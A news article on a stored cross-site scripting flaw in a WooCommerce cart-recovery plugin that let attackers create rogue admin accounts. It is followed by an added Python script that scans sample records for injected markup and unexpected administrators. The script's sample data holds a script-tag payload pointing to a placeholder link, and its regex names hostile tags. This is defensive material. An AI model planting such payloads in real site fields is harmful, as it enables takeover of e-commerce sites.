WordPress plugin to win back cart abandoners leaves sites open to attack

Plugin maker has issued a patch. Site owners cautioned to update their sites and carefully review their databases for possible script injections.

Ginny Marvin on March 12, 2019 at 1:33 pm | Reading time: 3 minutes

A vulnerability in a WordPress plugin has left e-commerce sites vulnerable, according to a report Monday from Defiant, makers of a WordPress firewall plugin.

What caused the vulnerability? The report says hackers are targeting the Abandon Cart Lite for WooCommerce plugin, which is currently installed on more than 20,000 sites. The plugin aims to help sites using WooCommerce win back users who abandoned their carts by sending them automated email notifications. The attackers are taking advantage of a stored cross-site scripting (XSS) flaw in the plugin.

How does it work? To infect and take over the sites, hackers added items to a cart, entered fake contact information in the checkout fields and injected malicious JavaScript with a bit.ly link in the “billing last name” field before abandoning the cart. The JavaScript then executes once an administrator logs in to view the list of abandoned carts in their WordPress dashboard.

The code enables two back doors to the site. One lets the hacker create an admin account named “woouser” on the site. The other lists all of the site’s plugins and looks for one that’s been disabled in order to create a backup back door in case the admin deletes the “woouser” account.

What’s being done? The plugin’s maker, Tyche Softwares, learned about the issue from user reports on the WordPress user forum and released a patched version — 5.2.0. If you’re using this plugin, be sure you’ve updated to the current 5.2.0 version and carefully review previous submissions in the database. The latest version also scans for the email address that was registered with the malicious “woouser” account and will delete that user if found.

Unknown vulnerability. “It’s also hard to tell how many successful XSS injections are sitting around waiting for an admin to open that page for the first time,” researcher and report author Mikey Veenstra told ZDNet, which first covered the attack. Veenstra also said that many unwitting sites might have already been attacked but haven’t seen any effects because the exploit hasn’t executed yet.

Why you should care. This is a good reminder that site vulnerabilities can come from many angles. It’s not clear how many sites have been infected or how the hackers were using the exploited sites. The report cautions site owners that the patch does not address the exploit occurring on inactive plugins and also warns that “the nature of the initial XSS payload allows the email address of newly created rogue admins to be changed with very little effort.” In other words, the initial “woouser” name could have been changed to something else and remain undetected.
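The database review the report recommends, as an added example that is not code from the article, Defiant or Tyche Softwares: a Python scan over constructed sample records that flags checkout fields carrying HTML or script markup (entity-encoded variants included) and lists administrator accounts outside the owner's known set, so a renamed “woouser” login or a changed email does not escape notice. The column names, table layout and sample rows are assumptions, not the plugin's real schema.

```python
import html
import re

# Constructed sample records standing in for the plugin's abandoned-cart table and
# for wp_users. Column names are assumptions, not the plugin's real schema.
ABANDONED_CARTS = [
    {"id": 1, "billing_first_name": "Alice", "billing_last_name": "Smith",
     "billing_address_1": "1 Main St"},
    {"id": 2, "billing_first_name": "x", "billing_address_1": "",
     # Shape of the payload the report describes: a script tag pulling a bit.ly link
     "billing_last_name": '<script src="https://bit.ly/PLACEHOLDER"></script>'},
    {"id": 3, "billing_first_name": "Bob", "billing_last_name": "O'Neil & Sons",
     "billing_address_1": "12 <3 Lane"},   # legitimate angle bracket, must not flag
    {"id": 4, "billing_first_name": "Eve", "billing_last_name": "Doe",
     # Entity-encoded variant; a naive LIKE '%<script%' query would miss it
     "billing_address_1": "&lt;iframe src=&quot;https://example.invalid&quot;&gt;"},
]
WP_USERS = [
    {"login": "siteowner", "email": "owner@example.com", "role": "administrator"},
    # Rogue account as described in the report, with its email already changed
    {"login": "woouser", "email": "someone@example.net", "role": "administrator"},
    {"login": "editor1", "email": "ed@example.com", "role": "editor"},
]

CHECKOUT_FIELDS = ("billing_first_name", "billing_last_name", "billing_address_1")
# Tags and attributes that should never appear in a customer's name or address
MARKUP = re.compile(r"<\s*/?\s*(script|iframe|img|svg|object|embed|link|meta)\b"
                    r"|\bon[a-z]+\s*=|javascript:", re.I)

def find_injected_rows(rows, fields=CHECKOUT_FIELDS):
    """Return (row id, field) pairs whose value contains HTML/JS markup.
    Values are entity-decoded first so encoded payloads are caught too."""
    hits = []
    for row in rows:
        for field in fields:
            value = html.unescape(str(row.get(field, "")))
            if MARKUP.search(value):
                hits.append((row["id"], field))
    return hits

def find_unexpected_admins(users, known_admin_logins):
    """Return administrator logins not on the owner's allowlist. Keyed on the role,
    not on the 'woouser' name or its email, since the report notes both can change."""
    return [u["login"] for u in users
            if u["role"] == "administrator" and u["login"] not in known_admin_logins]

if __name__ == "__main__":
    print("injected fields:", find_injected_rows(ABANDONED_CARTS))
    print("unexpected admins:", find_unexpected_admins(WP_USERS, {"siteowner"}))
```

Rows flagged by the first function should be inspected and the offending values removed or escaped before any admin opens the abandoned-carts page; the second function is only as good as the allowlist of administrators the site owner actually recognises.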

This story first appeared on Marketing Land.

About The Author

Ginny Marvin
Ginny Marvin was formerly Third Door Media’s Editor-in-Chief, running the day-to-day editorial operations across all publications and overseeing paid media coverage. Ginny Marvin wrote about paid digital advertising and analytics news and trends for Search Engine Land, Marketing Land and MarTech Today. With more than 15 years of marketing experience, Ginny has held both in-house and agency management positions. She can be found on Twitter as @ginnymarvin.

© 2022 Third Door Media, Inc. All rights reserved.